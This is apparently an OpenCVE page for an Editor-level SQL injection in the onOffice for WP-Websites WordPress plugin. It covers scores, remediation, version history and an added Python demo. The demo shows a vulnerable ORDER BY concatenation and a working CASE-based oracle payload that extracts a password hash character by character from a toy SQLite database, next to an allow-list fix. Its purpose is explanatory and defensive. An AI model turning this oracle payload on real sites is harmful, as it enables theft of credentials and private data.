Description
The onOffice for WP-Websites plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter in all versions up to, and including, 6.5.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Editor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
Published: 2025-10-15
Score: 4.9 Medium
EPSS: < 1% Very Low
KEV: No
Impact: SQL Injection allowing authenticated Editor or higher users to extract confidential database information
Action: Update Plugin
AI Analysis

Impact

The onOffice for WP-Websites plugin is vulnerable to a SQL Injection flaw that originates from the "order" parameter. Unescaped input combined with a lack of prepared statements enables an authenticated user with Editor privileges or greater to append arbitrary SQL to an existing query, allowing extraction of sensitive data stored in the WordPress database and compromising confidentiality. The CVSS vector (C:H/I:N/A:N) reflects this: the advisory describes data extraction only, not modification or denial of service.
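The following is an added example, not code from the onOffice plugin or from OpenCVE, illustrating the class of bug the advisory describes. It assumes the 'order' parameter feeds an ORDER BY clause (the advisory only names the parameter, not the clause), and it uses an in-memory SQLite database with constructed table names and rows in place of WordPress's MySQL schema. The point it demonstrates is twofold: an ORDER BY injection does not need stacked queries to leak data, because the attacker can turn row ordering into a boolean oracle; and ordering columns cannot be passed as prepared-statement placeholders, so the hardened form maps the parameter through an allow-list instead of escaping it.

```python
import sqlite3
import string

# Constructed sample data standing in for a WordPress database: a listings
# table the plugin sorts, and a users table holding a secret the attacker
# wants to read. Table and column names are illustrative only.
SECRET = "$P$BhashOfAdmin"
SCHEMA = """
CREATE TABLE estates (id INTEGER PRIMARY KEY, title TEXT, price INTEGER);
CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
INSERT INTO estates VALUES (1, 'Flat A', 300), (2, 'House B', 900), (3, 'Loft C', 500);
INSERT INTO wp_users VALUES (1, 'admin', '%s');
""" % SECRET

CHARSET = string.ascii_letters + string.digits + "$./"


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def list_estates_vulnerable(conn, order):
    # Vulnerable pattern: the user-controlled 'order' value is concatenated
    # straight into the ORDER BY clause. Placeholders cannot carry
    # identifiers, and no escaping or validation is applied, so whatever the
    # caller sends becomes part of the SQL.
    sql = "SELECT id, title, price FROM estates ORDER BY " + order
    return conn.execute(sql).fetchall()


def order_oracle(conn, position, guess):
    # Attacker's payload: a CASE expression that sorts by price when the
    # guessed character of the secret is right and by -price when it is
    # wrong. The id of the first returned row therefore answers a yes/no
    # question about the secret, one character at a time.
    payload = (
        "(CASE WHEN (SELECT substr(user_pass, %d, 1) FROM wp_users WHERE ID = 1) = '%s' "
        "THEN price ELSE -price END)" % (position, guess.replace("'", "''"))
    )
    rows = list_estates_vulnerable(conn, payload)
    return rows[0][0] == 1  # cheapest estate first means the guess was correct


def extract_secret(conn, length, charset=CHARSET):
    # Recovers up to `length` characters of the secret using only the
    # ordering oracle; stops early if no character in the charset matches.
    out = ""
    for pos in range(1, length + 1):
        for ch in charset:
            if order_oracle(conn, pos, ch):
                out += ch
                break
        else:
            break
    return out


# Hardened pattern: the parameter never reaches the SQL string. It is parsed
# into a column name and a direction, each looked up in a fixed allow-list,
# and the trusted allow-list values are what get interpolated.
ALLOWED_COLUMNS = {"id": "id", "title": "title", "price": "price"}
ALLOWED_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def list_estates_hardened(conn, order):
    column, _, direction = order.strip().partition(" ")
    col_sql = ALLOWED_COLUMNS.get(column.lower())
    dir_sql = ALLOWED_DIRECTIONS.get((direction or "asc").strip().lower())
    if col_sql is None or dir_sql is None:
        raise ValueError("invalid order parameter")
    sql = "SELECT id, title, price FROM estates ORDER BY %s %s" % (col_sql, dir_sql)
    return conn.execute(sql).fetchall()


if __name__ == "__main__":
    db = connect()
    print("leaked via ordering oracle:", extract_secret(db, len(SECRET)))
    print("hardened, price desc:", list_estates_hardened(db, "price desc"))
```

The same allow-list approach applies to $wpdb-based code: the placeholders in $wpdb->prepare() are for values, so an ORDER BY column or direction taken from the request must be matched against a fixed set of known identifiers before it is placed in the query.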

Affected Systems

All installations of the onOffice for WP-Websites plugin at version 6.5.1 or older are affected. The affected range was originally published as versions up to and including 5.7 and was widened to 6.5.1 on 8 Apr 2026 (see History below), so an earlier patch decision based on the 5.7 boundary should be revisited. The page lists no release that fixes the issue, so all such installations must be treated as vulnerable until the vendor supplies a corrected version.

Risk and Exploitability

The CVSS 3.1 score of 4.9 places the vulnerability in the medium severity range: the vector (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N) rates confidentiality impact as high but requires high privileges, which here means an Editor or higher account. The EPSS score of less than 1% suggests a low likelihood of exploitation in the wild, and the flaw is not listed in the CISA KEV catalog. Nevertheless, an attacker who obtains an Editor account, for example through credential reuse or a compromised contributor, could read protected database content such as user password hashes and use it to escalate further.

Generated by OpenCVE AI on April 27, 2026 at 23:41 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update the onOffice for WP-Websites plugin as soon as a release newer than 6.5.1 that addresses the SQL Injection flaw is available, and confirm the fix in the vendor changelog before relying on it.
  • If an update cannot be applied immediately, reduce the number of users with Editor or higher roles or reassign those roles to users who do not need access to the plugin's features.
  • Disabling or removing the onOffice for WP-Websites plugin from the WordPress installation eliminates the vulnerability until a fix is available.

Generated by OpenCVE AI on April 27, 2026 at 23:41 UTC.

Tracking


Advisories

No advisories yet.

History

Wed, 08 Apr 2026 17:30:00 +0000


Wed, 08 Apr 2026 17:00:00 +0000

Description
  Values Removed: The onOffice for WP-Websites plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter in all versions up to, and including, 5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Editor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  Values Added: The onOffice for WP-Websites plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter in all versions up to, and including, 6.5.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Editor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
Title
  Values Removed: onOffice for WP-Websites <= 5.7 - Authenticated (Editor+) SQL Injection
  Values Added: onOffice for WP-Websites <= 6.5.1 - Authenticated (Editor+) SQL Injection
References

Tue, 25 Nov 2025 14:15:00 +0000

Metrics ssvc
  Values Removed: {'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}
  Values Added: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}


Mon, 20 Oct 2025 13:30:00 +0000

First Time appeared
  Values Added: Wordpress; Wordpress wordpress
Vendors & Products
  Values Added: Wordpress; Wordpress wordpress

Wed, 15 Oct 2025 20:15:00 +0000

Metrics ssvc
  Values Added: {'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}


Wed, 15 Oct 2025 08:45:00 +0000

Description
  Values Added: The onOffice for WP-Websites plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter in all versions up to, and including, 5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Editor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
Title
  Values Added: onOffice for WP-Websites <= 5.7 - Authenticated (Editor+) SQL Injection
Weaknesses
  Values Added: CWE-89
References
Metrics cvssV3_1
  Values Added: {'score': 4.9, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N'}


MITRE

Status: PUBLISHED

Assigner: Wordfence

Published:

Updated: 2026-04-08T16:42:27.079Z

Reserved: 2025-09-05T18:28:17.507Z

Link: CVE-2025-10045

Vulnrichment

Updated: 2025-10-15T19:38:40.519Z

NVD

Status : Deferred

Published: 2025-10-15T09:15:36.600

Modified: 2026-04-15T00:35:42.020

Link: CVE-2025-10045

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-27T23:45:15Z

Weaknesses